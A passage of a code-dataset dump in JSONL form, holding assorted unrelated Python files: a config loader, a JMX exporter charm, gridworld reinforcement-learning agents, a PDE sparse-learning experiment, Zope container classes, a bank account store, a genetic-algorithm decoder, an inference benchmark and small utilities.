sys.argv[0].split(\"/\")\r\n\t\tself.appFullName = e[len(e)-1]\r\n\t\tself.appBaseName = self.appFullName\r\n\t\tif \".\" in self.appBaseName:\r\n\t\t\te = self.appBaseName.split('.')\r\n\t\t\tself.appBaseName = e[len(e)-2]\r\n\t\tself.appPath = os.path.dirname(os.path.realpath(self.appFullName))\r\n\t\t\r\n\t\t# default stateCacheFile path\r\n\t\t# format: {application_path}/{application_base_name}.cache\r\n\t\tself.stateCacheFile = os.path.join(self.appPath, \"{0}.cache\".format(self.appBaseName))\r\n\t\t\r\n\t\tif self.debugEnabled:\r\n\t\t\tprint(\"sys.argv[0]: {0}\".format(sys.argv[0]))\r\n\t\t\tprint(\"realpath(sys.argv[0]): {0}\".format(os.path.realpath(sys.argv[0])))\r\n\t\t\tprint(\"dirname(realpath(sys.argv[0])): {0}\".format(os.path.dirname(os.path.realpath(sys.argv[0]))))\r\n\t\r\n\t\t\tprint(\"script full name: {0}\".format(self.appFullName))\r\n\t\t\tprint(\"script base name: {0}\".format(self.appBaseName))\r\n\t\t\tprint(\"script location: {0}\".format(self.appPath))\r\n\t\t\tprint(\"stateCacheFile: {0}\".format(self.stateCacheFile))\r\n\t\t\r\n\t\t# Check for commandline arguments\r\n\t\t# Load config\r\n\t\tif (len(sys.argv) >= 2):\r\n\t\t\t\r\n\t\t\t# build a path from supplied argument accounting for\r\n\t\t\t# referencing local file versus remote file (./ vs full path /)\r\n\t\t\tself.configPath = sys.argv[1]\r\n\t\t\tif self.configPath[:2] != \"./\":\r\n\t\t\t\tself.configPath = os.path.join(self.appPath, self.configPath)\r\n\r\n\t\t\t# Supplied config path is not a real file or cannot be accessed\t\r\n\t\t\tif not os.path.isfile(self.configPath):\r\n\t\t\t\tprint(\"cannot access configuration file {0}\".format(sys.argv[1]))\r\n\t\t\t\texit()\r\n\t\telse:\r\n\t\t\t\r\n\t\t\t# build a default config file and path based on script base name\r\n\t\t\tself.configPath = os.path.join(self.appPath, \"{0}.cfg\".format(self.appBaseName))\r\n\t\t\t\r\n\t\t\t# the default config file does not exist or could not be accessed\r\n\t\t\tif not os.path.isfile(self.configPath):\r\n\t\t\t\tprint(\"needs config; eg. {0}.cfg\".format(self.appBaseName))\r\n\t\t\t\texit()\r\n\t\t\t\r\n\t\t# Try to process config file\r\n\t\ttry:\r\n\t\t\twith open(self.configPath) as data_file:\r\n\t\t\t\tself.params = json.load(data_file)\r\n\t\t\tprint(\"loaded config from: {0}\".format(self.configPath))\r\n\t\texcept:\r\n\t\t\tprint(\"unable to process configuration file {0}\".format(self.configPath))\r\n\t\t\tprint(sys.exc_info()[0])\r\n\t\t\traise\r\n\t\t\r\n\t\t# Pass in the fruits of our path wrangling efforts\r\n\t\tself.params[\"appFullName\"] = self.appFullName\r\n\t\tself.params[\"appBaseName\"] = self.appBaseName\r\n\t\tself.params[\"appPath\"] = self.appPath\r\n\t\tif \"stateCacheFile\" not in self.params:\r\n\t\t\tself.params[\"stateCacheFile\"] = self.stateCacheFile\r\n\r\n\t\tself.configured = True\r\n\t\treturn False","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405902565","text":"from charms.reactive import (when, when_any, when_not, when_none,\n set_flag, clear_flag, hook)\n\nfrom charmhelpers.core import hookenv\n\nfrom charms.layer.jmxexporter import JMXExporter\n\n\ndef refresh():\n jmx = JMXExporter()\n\n clear_flag('jmxexporter.service-installed')\n\n if not hookenv.config()['config']:\n hookenv.status_set('waiting', 'waiting for config')\n\n if jmx.is_running():\n jmx.stop()\n\n return\n\n hookenv.status_set('maintenance', 'refreshing service')\n jmx.install()\n jmx.restart()\n hookenv.status_set('active', 'running')\n set_flag('jmxexporter.service-installed')\n\n\n@when_not('jmxexporter.service-installed')\ndef waiting():\n refresh()\n\n\n@hook('config-changed')\ndef config_changed():\n refresh()\n\n\n@when_any('host-system.available', 'host-system.connected')\n@when_not('jmx.connected')\ndef host_added():\n refresh()\n set_flag('jmx.connected')\n\n\n@when_none('host-system.available', 'host-system.connected')\n@when('jmx.connected')\ndef host_removed():\n refresh()\n clear_flag('jmx.connected')\n","sub_path":"charm/jmx-exporter/reactive/jmxexporter.py","file_name":"jmxexporter.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631650340","text":"import matplotlib\nimport pdb;\nmatplotlib.use(\"TkAgg\")\nimport gym\nimport gridworld\nfrom gym import wrappers, logger\nimport numpy as np\nfrom policy_finder import valueIteration, policyIteration\nimport copy\nimport sys\nfrom utils import drawValuePolicyMap\nimport matplotlib.pyplot as plt\n\n\nclass RandomAgent(object):\n \"\"\"The world's simplest agent!\"\"\"\n\n def __init__(self, action_space):\n self.action_space = action_space\n\n def act(self, observation, reward, done):\n return self.action_space.sample()\n\nclass ValueIterationAgent(object):\n \"\"\"agent that folows value ietration policy\"\"\"\n def __init__(self, statedic, mdp, epsilon = 0.01, gamma= 0.95):\n self.policy, self.value = valueIteration(statedic, mdp, epsilon, gamma)\n def act(self, observation):\n return self.policy[str(observation.tolist())]\n\nclass PolicyIterationAgent(object):\n def __init__(self, statedic, mdp, epsilon = 0.01, gamma= 0.95):\n self.policy, self.value = policyIteration(statedic, mdp, epsilon, gamma)\n def act(self, observation):\n return self.policy[str(observation.tolist())]\nif __name__ == '__main__':\n\n\n env = gym.make(\"gridworld-v0\")\n env.seed(0) # Initialise le seed du pseudo-random\n\n\n # Faire un fichier de log sur plusieurs scenarios\n outdir = 'gridworld-v0/random-agent-results'\n envm = wrappers.Monitor(env, directory=outdir, force=True, video_callable=False)\n # for each type of cases we associate a reword\n env.setPlan(\"gridworldPlans/plan\" +sys.argv[1]+ \".txt\", {0: -0.001, 3: 1, 4: 1, 5: -1, 6: -1})\n\n # statedict : key : string of state \"[[], []...] \" : int number of the state # nombre de clé >\n # mdp { string of state : {int de l'action : [(proba, futureState, reward, done)] } } # nombre de clé\n statedic, mdp = env.getMDP() # recupere le mdp , statedic\n # policy : { state : action}\n\n agent = PolicyIterationAgent(statedic, mdp, 0.01, gamma = 0.95)\n #fig = drawValuePolicyMap(agent)\n #plt.savefig(f\"./graphs/plan{sys.argv[1]}_epsilon0.01_gamma0.95.png\")\n env.seed() # Initialiser le pseudo aleatoire\n episode_count = int(sys.argv[2])\n reward = 0\n done = False\n rsum = 0\n FPS = 0.0001\n for i in range(episode_count):\n obs = envm.reset()\n env.verbose = (i % 100 == 0 and i > 0) # afficher 1 episode sur 100\n if env.verbose:\n env.render(FPS)\n j = 0\n rsum = 0\n while True:\n action = agent.act(obs)\n obs, reward, done, _ = envm.step(action)\n rsum += reward\n j += 1\n if env.verbose:\n env.render(FPS)\n if done:\n print(\"Episode : \" + str(i) + \" rsum=\" + str(rsum) + \", \" + str(j) + \" actions\")\n break\n print(\"done\")\n env.close()\n","sub_path":"tme3/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206851122","text":"from __init__ import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n## for Palatino and other serif fonts use:\n# rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\nfrom data_analysis import Analyze\nfrom mc2pdf import MCprocessing\nfrom datamanage import DataIO\nfrom montecarlo import MonteCarlo\nfrom analytical_solutions import AnalyticalSolution, gaussian\nfrom mc2pdf import MCprocessing\nfrom pdfsolver import PdfGrid\nfrom visualization import Visualize\nfrom Learning import PDElearn\nfrom helper_functions import *\nimport numpy as np\nimport pdb\nimport time\n\n\nsave = True\ncheckExistence = True\n# plotpdf = True\nprintlearning = True\nsavenameMC = 'advection_reaction_randadv_analytical_712'+'.npy'\ncase = 'advection_reaction_randadv_analytical'\n\n# Read MC simulations\nD = DataIO(case=case, directory=MCDIR)\nfu, gridvars, ICparams = D.loadSolution(savenameMC)\nnum_realizations = ICparams['num_realizations']\n\n####################### KDE\n\nnu = 200\nu_margin = -1e-10\nbandwidth = 'scott'\ndistribution = 'PDF'\n\n####################### Learning\n\n# Adjust Size\npt = 1\npx = 1\npu = 1\nmu = [0.2, 1]\nmx = [0, 1]\nmt = [0, 1]\ncomments \t\t\t= ''\nfeature_opt = '1storder_close'\ntrainratio\t\t\t= 0.9\nnzthresh = 1e-10\ncoeforder = 2\nvariableCoef \t\t= True\nvariableCoefBasis \t= 'simple_polynomial'\nprint_rfeiter\t\t= True\nshuffle\t\t\t\t= False\nnormalize\t\t\t= True\nmaxiter\t\t\t\t= 10000\n\nuse_rfe\t\t\t\t= True\nrfe_alpha \t= 0.001\nRegCoef\t\t\t\t= 0.000005\nLassoType\t\t\t= 'LassoLarsCV'\ncv\t\t\t\t\t= 5\ncriterion\t\t\t= 'aic'\n\n###############################\n\n# coeforder_vec = [2, 1, 0, 3]\nfeature_opt_vec = ['1storder_close', '1storder']\n# LassoType_vec \t= ['LassoCV', 'LarsCV', 'LassoLarsCV', 'LassoLarsIC']\nrfe_alpha_vec\t= [0.000001, 0.000005, 0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005, 0.01]#, 0.05, 0.08]\n\n###############################\n\noutput_VEC = []\nmetadata_VEC = []\nfilename_VEC = []\n\nfor feature_opt in feature_opt_vec:\n\n\toutput_vec = []\n\tmetadata_vec = []\n\tfilename_vec = []\n\n\tfor rfe_alpha in rfe_alpha_vec:\n\t\tprint('---------------------')\n\t\tprint('\\trfe_alpha = ', rfe_alpha)\n\t\tprint('---------------------')\n\n\t\t# BUILD PDF\n\t\tMCprocess = MCprocessing(savenameMC, case=case)\n\t\tsavenamepdf = MCprocess.buildKDE(nu, distribution=distribution, MCcount=num_realizations, save=save, u_margin=u_margin, bandwidth=bandwidth)\n\n\t\t# LEARN\n\t\tdataman = DataIO(case, directory=PDFDIR) \n\t\tfu, gridvars, ICparams = dataman.loadSolution(savenamepdf, array_opt='marginal')\n\n\t\tadjustgrid = {'mu':mu, 'mx':mx, 'mt':mt, 'pu':pu, 'px':px, 'pt':pt}\n\t\tgrid = PdfGrid(gridvars)\n\t\tfu = grid.adjust(fu, adjustgrid)\n\n\n\t\tdifflearn = PDElearn(grid=grid, fu=fu, ICparams=ICparams, scase=case, trainratio=trainratio, verbose=True)\n\t\tfilename = difflearn.fit_sparse(feature_opt=feature_opt, variableCoef=variableCoef, variableCoefBasis=variableCoefBasis, \\\n\t\t variableCoefOrder=coeforder, use_rfe=use_rfe, rfe_alpha=rfe_alpha, nzthresh=nzthresh, maxiter=maxiter, \\\n\t\t LassoType=LassoType, RegCoef=RegCoef, cv=cv, criterion=criterion, print_rfeiter=print_rfeiter, shuffle=shuffle, \\\n\t\t basefile=savenamepdf, adjustgrid=adjustgrid, save=save, normalize=normalize, comments=comments)\n\n\t\t# READ Learning\n\t\tD = DataIO(case, directory=LEARNDIR)\n\t\toutput, metadata = D.readLearningResults(filename)\n\n\t\toutput_vec.append(output)\t\n\t\tmetadata_vec.append(metadata)\n\t\tfilename_vec.append(filename)\n\n\toutput_VEC.append(output_vec)\n\tmetadata_VEC.append(metadata_vec)\n\tfilename_VEC.append(filename_vec)\n\n\n\tprint('files = [')\n\tfor f in filename_vec:\n\t\tprint(\"\\'\"+f+\"\\',\")\n\tprint(']')\n\n\n## PLOT\nA = Analyze()\nsavename = 'advectreact_rfe' + \"_closecomp_\" + LassoType + \"_\" + str(coeforder)\nxlabel = 'RFE Threshold'\nfeature_opt_vec = ['Closure Prob.', 'Full Eqn.']\n\nlinestyles = ['solid', 'dashed', 'dashdot', 'dotted']\nmarker = ['o', 'v', 's', '*']#, '^', '>', '<', 'x', 'D', '1', '.', '2', '3', '4']\nstyles = [[l, m] for l in linestyles for m in marker]\nprint(styles)\nprint(len(styles))\n\n\nfig, ax = plt.subplots(1, 2, figsize=(13, 5.5))\nvariable = rfe_alpha_vec\n\nleg0 = []\nleg1 = []\nfor i, outvec in enumerate(output_VEC):\n\ttrainRMSE, testRMSE = A.getTrainTestDependence(outvec)\n\n\tax[0].plot(variable, testRMSE, linestyle=linestyles[i], linewidth=3, marker='.', markersize=8)\n\tleg0.append(feature_opt_vec[i])\n\n\n\t# Coefficients Dependence Multi\n\tfeatarray, relevant_feats = A.getCoefDependence(outvec, threshold=0.01, invert_sign=True)\n\tfor j in range(len(relevant_feats)):\n\t\tax[1].plot(variable, featarray[:, j], linestyle=styles[i][0], marker=styles[i][1], linewidth=2.5, markersize=7)\n\tleg = ax[1].legend(latexify_varcoef(relevant_feats, cdf=False), bbox_to_anchor=(.98,1), fontsize=14)\n\t\nax[0].set_xlabel(xlabel, fontsize=14)\nax[0].set_ylabel('RMSE', fontsize=14)\nax[0].legend(leg0)\nax[0].set_xscale('log')\n\nax[1].set_xscale('log')\nax[1].grid(color='k', linestyle='--', linewidth=0.5)\nax[1].set_xlabel(xlabel, fontsize=14)\nax[1].set_ylabel('Coefficients', fontsize=14)\n\nfig.savefig(FIGDIR+savename+'.pdf')\nplt.show()\n\n\n","sub_path":"code/testcases/advectreact_randadv_rfe_close.py","file_name":"advectreact_randadv_rfe_close.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523841065","text":"from tr.interfaces import ITRObject, ITRWalker, ITRContentType, ITRObjectChoiceField, ITRObjectListField\nfrom persistent.list import PersistentList\nfrom zope.app.container.btree import BTreeContainer\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import adapts, getUtility\nfrom zope.interface import implements\nfrom zope.security.proxy import removeSecurityProxy\nfrom BTrees.OIBTree import OITreeSet\nfrom zope.schema import getFieldNames\nfrom zope.app.interface import queryType\nfrom ap import interfaces\nfrom zope.app.component.hooks import getSite\nfrom zope.app.component.site import SiteManagerContainer\nfrom zope.app.container.btree import BTreeContainer\nfrom zope.component import provideUtility\nfrom zope.event import notify\nfrom zope.interface import implements\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\n\n\nclass TRObject(BTreeContainer):\n \"\"\" \"\"\"\n implements(ITRObject)\n __lower__ = __upper__ = completed = None\n\n def __init__(self):\n self.completed = OITreeSet()\n self.__lower__ = PersistentList([])\n self.__upper__ = PersistentList([])\n super(TRObject, self).__init__()\n\n\nclass MockField(object):\n implements(ITRObjectListField)\n required = False\n\nclass TRWalker(object):\n \"\"\"\n Extend to the core of 'jc':\n\n If getLowerAttr or getUpperAttr will return\n None - nothing will happen.\n I need that for example, to break the depend.\n When mission is created: it will store vehicle, driver\n and attach.\n BUT! this 3 objects will not will store missions!\n\n missions are huge. in deferred tasks i store task in that\n objects and move tasks to completed (TreeSet).\n\n Instead, i will use index to chain mission and other staff (see indexes.py)\n\n\n \"\"\"\n implements(ITRWalker)\n adapts(ITRObject)\n # .............. name .. type may delete? .......\n upper_attrs = ['__upper__']\n lower_attrs = ['__lower__']\n\n def __init__(self, context):\n self.context = context\n self.intid = getUtility(IIntIds, context=context)\n\n\n def obForSure(self, some):\n \"\"\" just returns object\"\"\"\n if type(some) is int:\n return self.intid.getObject(some)\n if some is None: return PersistentList([])\n return some\n\n\n def listForSure(self, attr):\n if attr is None: return []\n at = removeSecurityProxy(getattr(self.context, attr))\n if at is None: return []\n if type(at) is list or type(at) is PersistentList:\n pass\n elif type(at) is OITreeSet:\n at = [k for k in at.keys()]\n else: at = [at]\n return at\n\n def getObjects(self, attr):\n obs = []\n for o in self.listForSure(attr):\n obs.append(self.obForSure(o))\n return obs\n\n\n # subclusses override this!\n def getUpperAttr(self, ob):\n return '__upper__'\n\n # subclusses override this\n def getLowerAttr(self, ob):\n return '__lower__'\n\n\n\n def getOtherLevel(self, attrs) :\n # this means view call this method. view know nothing about ob\n obs = []\n for a in attrs:\n obs += self.getObjects(a)\n return obs\n\n def getLower(self, ob=None):\n \"\"\"\n MAIN method! every body use it!\n pages are use it with ob=None\n append and remove - use ob as indicator to get attr\n \"\"\"\n return self.getOtherLevel(self.lower_attrs)\n\n\n def getUpper(self, ob=None):\n \"\"\"\n MAIN method! every body use it!\n pages are use it with ob=None\n append and remove - use ob as indicator to get attr\n \"\"\"\n return self.getOtherLevel(self.upper_attrs)\n\n\n # def getField(self, ob):\n\n\n def setOtherLevel(self, ob, meth, upper=True):\n \"\"\"\n to do!\n if 'append' - check it list or not? (TRObjectChoice or TRObjectList)\n if list - append, if not just set the object\n if 'remove' - check if it is required or not!\n if required - just do not delete!\n \"\"\"\n if upper:\n attr = self.getUpperAttr(ob)\n else:\n attr = self.getLowerAttr(ob)\n\n # no need!\n if attr is None: return\n\n intrfc = queryType(self.context, ITRContentType)\n field = None\n for n in getFieldNames(intrfc):\n if attr == n:\n field = intrfc[n]\n break\n # i have a specified field or i have None, cause attribute is __lower__ or __upper__\n if field is None:\n field = MockField()\n\n if ITRObjectChoiceField.providedBy(field):\n # treat single element\n if meth == 'append':\n setattr(self.context, attr, ob)\n elif meth == 'remove':\n if not field.required:\n setattr(self.context, attr, None)\n\n elif ITRObjectListField.providedBy(field):\n # treat list\n if meth == 'append':\n to_append = getattr(self.context, attr)\n to_append.append(ob)\n setattr(self.context, attr, to_append)\n elif meth == 'remove':\n to_remove = getattr(self.context, attr)\n if ob in to_remove:\n if field.required and len(to_remove) ==1:\n pass\n else:\n to_remove.remove(ob)\n setattr(self.context, attr, to_remove)\n\n\n def appendUpper(self, ob):\n self.setOtherLevel(ob, 'append')\n\n def removeUpper(self, ob):\n self.setOtherLevel(ob, 'remove')\n\n def appendLower(self, ob):\n self.setOtherLevel(ob, 'append', False)\n\n def removeLower(self, ob):\n self.setOtherLevel(ob, 'remove', False)\n\n\n\n#sys.path.append('/usr/local/Zope-3.4.0/lib/python/')\n#sys.path.append('/home/aganzha/workspace/gt/trunk/gutentag/src/')\n\n\nclass TRContainer(BTreeContainer):\n implements(interfaces.ITRContainer)\n\n\nclass TRSite(SiteManagerContainer, BTreeContainer):\n implements(interfaces.ITRSite)\n def setSiteManager(self, site_manager):\n \"\"\" This method called from object added handler (see handlers)\n Firstly, I install SiteManager\n After: all folders and utilities via firing our custom event\"\"\"\n super(TRSite, self).setSiteManager(site_manager)\n notify(NewTRSiteEvent(self))\n\nclass NewTRSiteEvent(object):\n implements(interfaces.INewTRSiteEvent)\n def __init__(self, site):\n self.object = site\n\ndef get_container_interfaces():\n for key,value in interfaces.__dict__.items():\n if key.find('Container') != -1 and len(key) > len('ITRContainer'):\n yield key, value\n\n\n\ndef make_container_factory(interface):\n def container_from_interface(context=None):\n if context is not None and context.__parent__ is not None:\n site = context\n while not interfaces.ITRSite.providedBy(site):\n site = site.__parent__\n else:\n site = getSite()\n if site is None:\n #fuck! during testing i can`t get the site :(\n from ap import tests\n site = tests.site\n container = None\n for v in site.values():\n if interface.providedBy(v):\n container = v\n break\n return container\n return container_from_interface\n\n\ndef getContainerFor(interface):\n if type(interface) == type('string'):\n for k,v in get_container_interfaces():\n if k == interface:\n interface = v\n break\n return make_container_factory(interface)()\n\n\n\ndef make_term(int_ids, x):\n name_chooser = ITRNameChooser(x)\n name = name_chooser.getCleanName()\n return SimpleTerm(x, token=int_ids.getId(x), title=name)\n\n\ndef install_vocabularies():\n \"\"\" so, i`ve just will return the container. Not the vocabulary!\"\"\"\n interfaces = get_container_interfaces()\n interfaces_keys = [k for k,v in get_container_interfaces()]\n def voc_factory(context):\n voc = SimpleVocabulary.fromValues(interfaces_keys)\n return voc\n provideUtility(voc_factory, IVocabularyFactory, u'container interfaces')\n #moc vocabularies, which factory just returns the container factory as IVocabularyFactory\n for k,v in interfaces:\n provideUtility(make_container_factory(v), IVocabularyFactory, k)\n\n\ninstall_vocabularies()\n","sub_path":"persistent.py","file_name":"persistent.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453273982","text":"from utility import openFile, converttohash\n\n# MIDN 2/C Geary \n# Sets up the AcctStore class, in which all of the data read in from acctfile.dat is stored as an AcctStore object.\n\nclass AcctStore:\n\n _pin = 0\n _bal = 1\n _lock = 2\n\n def __init__(self, filename):\n self._D = {}\t\t\t\t#dict() also works instead of {}\n f = openFile(filename)\n s = f.readline().strip()\n while (s != \"\"):\n L = s.split(\" \")\n acct = L[0]\n pinHash = L[1]\n balance = float(L[2])\n locked = int(L[3])\n self._D[acct] = [pinHash,balance,locked]\n s = f.readline().strip()\n f.close()\n\n def rewrite2File(self,filename):\n f = openFile(filename,\"w\") # uses the openFile function from the utility module, which is also in this directory.\n for k,v in self._D.items():\n L = [k] + v + [\"\\n\"] # create a list of the key, values, and \"\\n\"\n L = list(map(str,L)) # convert all to strings\n s = \" \".join(L)\n f.write(s) # writes the string to the file\n f.close()\n return\n\n def Deposit(self, acct, amt):\n #pre: acct is valid and exists in the store; amt is a positive float number.\n \t\t#post: acct balance is increased by amt\n self._D[acct][self._bal] += amt \n return\n\n def Withdraw(self, acct, amt):\n self._D[acct][self._bal] -= amt\n\n #pre: acct is valid and exists in the store; amt is a positive float number.\n #pre: amt <= acct balance\n \t\t#post: acct balance is decreased by amt\n def GetBalance(self, acct):\n #pre: acct is valid and exists in the store\n \t\t#post: Returns the balance (float) for account\n return float(self._D[acct][self._bal])\n\n def GetHashedPin(self, acct):\n #pre: acct is valid and exists in the store\n #post: Returns a string that is the hashed PIN for acct\n return self._D[acct][self._pin]\n\n def HashAndStorePin(self, acct, clearPIN):\n #pre: acct is valid and exists in the store; clearPIN is a string of four digits\n \t\t#post: Stores the hashed version of clearPIN in the store.\n \t\t#Note: Calls converttohash from utility.py to convert clearPIN to its hashed analog\n self._D[acct][self._pin] = converttohash(clearPIN)\n return\n def FreezeAcct(self, acct):\n #pre: acct is valid and exists in the store\n \t\t#post: Freezes the acct\n self._D[acct][self._lock] = 0\n return None\n def UnFreezeAcct(self, acct):\n\t\t #pre: acct is valid and exists in the store\n\t \t#post: Unfreezes the acct\n self._D[acct][self._lock] = 1\n print(\"Account #{0} is now unfrozen!\".format(acct))\n return\n def IsInStore(self, acct):\n #pre: acct is valid\n \t\t#post: Returns true if the acct is in store and false otherwise\n if acct in self._D:\n return True\n else:\n return False\n\n def IsUnlocked(self, acct):\n #pre: acct is valid and exists in the store\n \t\t#post: Returns true if the acct is unlocked and false otherwise\n if self._D[acct][self._lock] == 0:\n return False\n else:\n return True\n return\n","sub_path":"accountstore.py","file_name":"accountstore.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391749097","text":"def decode(population, x_1, x_2, l1, l2):\n x1_bin = population[:,:5]\n x2_bin = population[:,5:]\n x1_binary = [''.join(row) for row in x1_bin.astype(str).tolist()]\n x2_binary = [''.join(row) for row in x2_bin.astype(str).tolist()]\n d1 = [float(int(row,2)) for row in x1_binary]\n d2 = [float(int(row,2)) for row in x2_binary]\n \n x1=[]\n x2=[]\n [x1.append(min(x_1) + (max(x_1)-min(x_1))*d/pow(2,(l1-1))) for d in d1]\n [x2.append(min(x_2) + (max(x_2)-min(x_2))*d/pow(2,(l2-1))) for d in d2]\n \n return [x1, x2]\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625498152","text":"import torch\nimport time\nimport concurrent.futures\nimport numpy as np \n\n\ndef benchmark(filename, example, n_models=2, n_threads=2, batches_per_thread=1000):\n \"\"\"\n Record performance statistics for a serialized model and its input example.\n\n Arguments:\n filename: The serialized torchscript model to load for benchmarking.\n example: An example model input.\n n_models: The number of models to load.\n n_threads: The number of simultaneous threads to execute inferences on.\n batches_per_thread: The number of example batches to run per thread.\n\n Returns:\n A dictionary of performance statistics.\n \"\"\"\n\n # Load models\n models = [torch.jit.load(filename) for _ in range(n_models)]\n\n # Warmup\n for _ in range(8):\n for model in models:\n model(*example)\n\n latencies = []\n\n # Thread task\n def task(model):\n for _ in range(batches_per_thread):\n start = time.time()\n model(*example)\n finish = time.time()\n latencies.append((finish - start) * 1000)\n\n # Submit tasks\n begin = time.time()\n with concurrent.futures.ThreadPoolExecutor(max_workers=n_threads) as pool:\n for i in range(n_threads):\n pool.submit(task, models[i % len(models)])\n end = time.time()\n\n # Compute metrics\n boundaries = [50, 95, 99]\n percentiles = {}\n\n for boundary in boundaries:\n name = f'latency_p{boundary}'\n percentiles[name] = np.percentile(latencies, boundary)\n duration = end - begin\n batch_size = 0\n for tensor in example:\n if batch_size == 0:\n batch_size = tensor.shape[0]\n inferences = len(latencies) * batch_size\n throughput = inferences / duration\n\n # Metrics\n metrics = {\n 'filename': str(filename),\n 'batch_size': batch_size,\n 'batches': len(latencies),\n 'inferences': inferences,\n 'threads': n_threads,\n 'models': n_models,\n 'duration': duration,\n 'throughput': throughput,\n **percentiles,\n }\n\n display(metrics)\n\n\ndef display(metrics):\n \"\"\"\n Display the metrics produced by `benchmark` function.\n\n Args:\n metrics: A dictionary of performance statistics.\n \"\"\"\n pad = max(map(len, metrics)) + 1\n for key, value in metrics.items():\n\n parts = key.split('_')\n parts = list(map(str.title, parts))\n title = ' '.join(parts) + \":\"\n\n if isinstance(value, float):\n value = f'{value:0.3f}'\n\n print(f'{title :<{pad}} {value}')\n","sub_path":"sagemaker/recommendation/Neural-Collaborative-Filtering-On-SageMaker/2_Trn1_Inf2/src/inf2_util.py","file_name":"inf2_util.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46029929","text":"\"\"\"\r\n General utilities used throughout codes\r\n\"\"\"\r\nimport json\r\nimport os\r\nimport logging\r\n# from src.settings import *\r\nimport sys\r\nimport math\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef print_json(data):\r\n # pretty prints trips\r\n print(json.dumps(data, sort_keys=True, indent=4))\r\n\r\ndef write_file(data, file, folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder)\r\n with open('{}/{}'.format(folder, file), 'w') as save_result:\r\n save_result.write('{}'.format(data))\r\n\r\n\r\ndef load_json(file, input_folder, print_result=False, refactor_keys=False):\r\n # refactor keys: to put keys from strings to ints, common for units.json\r\n # with open('%s/%s.json' % (input_folder, file), 'r') as data_file:\r\n if not file.endswith('.json'):\r\n file += '.json'\r\n with open(os.path.join(input_folder, file), 'r') as data_file:\r\n json_data = json.load(data_file)\r\n if print_result:\r\n print('\\n\\n----> File %s is printed:' % file)\r\n print_json(json_data)\r\n\r\n if refactor_keys:\r\n return {int(id): data for id, data in json_data.items()}\r\n else:\r\n return json_data\r\n\r\n\r\ndef save_json(data, file, folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder, True)\r\n if not file.endswith('.json'):\r\n file += '.json'\r\n with open(os.path.join(folder, file), 'w') as fp:\r\n # json.dump(data, fp, indent=4, encoding='utf-8')\r\n # utf-8 does not work with parse_gebieden @peter\r\n json.dump(data, fp, indent=4, encoding='iso-8859-1')\r\n\r\ndef save_json_less_overhead(data, file, folder):\r\n with open(os.path.join(folder, file), 'w') as fp:\r\n json.dump(data, fp, indent=4, encoding='utf-8')\r\n # utf-8 does not work with parse_gebieden @peter\r\n # json.dump(data, fp, indent=4, encoding='iso-8859-1')\r\n\r\ndef save_non_python_object_to_json(data, file, folder):\r\n # more info: https://pythontips.com/2013/08/08/storing-and-loading-data-with-json/\r\n def jdefault(o):\r\n return o.__dict__\r\n json.dump(data, os.path.join(folder, file), indent=4, encoding='utf-8', default=jdefault)\r\n\r\n\r\ndef progress_bar(progress):\r\n \"\"\"\r\n Input your progress like 0.03 and this function converts it to a progress bar output\r\n \"\"\"\r\n sys.stdout.write(\"\\r[%-20s] %d%%\" % ('='*int(math.floor(20 * progress)), 100*progress))\r\n sys.stdout.flush()\r\n","sub_path":"src/utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431806299","text":"\n\n\n\n\n\n\"\"\"\nVerifies duplicate ldflags are not removed.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\n\ndef CheckContainsFlags(args, substring):\n if args.find(substring) is -1:\n print('ERROR: Linker arguments \"%s\" are missing in \"%s\"' % (substring,\n args))\n return False;\n return True;\n\nif __name__ == '__main__':\n args = \" \".join(sys.argv)\n print(\"args = \" +args)\n if not CheckContainsFlags(args, 'lib1.a -Wl,--no-whole-archive') \\\n or not CheckContainsFlags(args, 'lib2.a -Wl,--no-whole-archive'):\n sys.exit(1);\n sys.exit(0)\n","sub_path":"third_party/python/gyp/test/linux/ldflags-duplicates/check-ldflags.py","file_name":"check-ldflags.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117637303","text":"'''\r\n13.参考文件夹中的图片,模拟商场购物,编写代码\r\n'''\r\nmoney = input('请输入消费金额,选择是否参加活动:')\r\nif money.isdigit():\r\n money = int(money)\r\n if money < 50:\r\n print('你这次的购买金额少了,不能参加活动,886')\r\n else:\r\n while True:\r\n num = 